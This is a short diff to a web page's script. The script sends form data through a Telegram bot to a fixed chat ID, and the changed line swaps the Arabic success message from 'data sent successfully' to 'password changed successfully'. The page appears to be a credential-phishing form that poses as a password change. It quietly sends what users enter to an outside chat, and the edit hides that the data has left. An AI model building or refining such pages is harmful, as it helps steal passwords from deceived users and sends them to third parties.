--- a/index.html
+++ b/index.html
@@ -93,7 +93,7 @@
       const chatId = '6817512459';
 
       fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${message}`)
-        .then(response => alert('تم إرسال البيانات بنجاح'))
+        .then(response => alert('تم تغيير كلمة المرور بنجاح'))
         .catch(error => alert('حدث خطأ أثناء الإرسال'));
     });
   </script>
